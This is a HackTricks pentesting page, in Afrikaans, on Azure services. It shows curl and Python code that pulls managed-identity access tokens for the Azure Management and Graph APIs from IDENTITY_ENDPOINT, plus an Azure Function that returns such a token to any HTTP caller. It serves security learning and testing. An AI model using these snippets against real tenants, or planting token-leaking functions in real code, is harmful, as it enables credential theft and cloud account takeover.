Az - Services

PreviousAz - Password Spraying NextAz - Entra ID (AzureAD) & Azure IAM

Last updated 3 days ago

Az - Services

Leer & oefen AWS Hacking: Leer & oefen GCP Hacking:

Ondersteun HackTricks

Kyk na die !
Sluit aan by die 💬 of die of volg ons op Twitter 🐦 .
Deel hacking truuks deur PRs in te dien na die en github repos.

Portale

Jy kan die lys van Microsoft portale in vind.

Rou versoeke

Azure API via Powershell

Kry access_token van IDENTITY_HEADER en IDENTITY_ENDPOINT: system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');.

Vra dan die Azure REST API om die subskripsie ID en meer te kry.

Azure API via Python Weergawe

of binne 'n Python-funksie:

Lys van Dienste

Die bladsye van hierdie afdeling is georden volgens Azure-diens. Daarin sal jy inligting oor die diens (hoe dit werk en vermoëns) en ook hoe om elke diens te evalueer, vind.

Ondersteun HackTricks

PreviousAz - Password Spraying NextAz - Entra ID (AzureAD) & Azure IAM

Last updated 3 days ago

Portale

Jy kan die lys van Microsoft portale in vind.

Rou versoeke

Azure API via Powershell

Kry access_token van IDENTITY_HEADER en IDENTITY_ENDPOINT:

system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');

Vra dan die Azure REST API om die subskripsie ID en meer te kry.

Azure API via Python Weergawe

IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']

print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

of binne 'n Python-funksie:

import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)

Lys van Dienste

Die bladsye van hierdie afdeling is georden volgens Azure-diens. Daarin sal jy inligting oor die diens (hoe dit werk en vermoëns) en ook hoe om elke diens te evalueer, vind.

Leer & oefen AWS Hacking: Leer & oefen GCP Hacking:

Ondersteun HackTricks

Kyk na die !
Sluit aan by die 💬 of die of volg ons op Twitter 🐦 .
Deel hacking truuks deur PRs in te dien na die en github repos.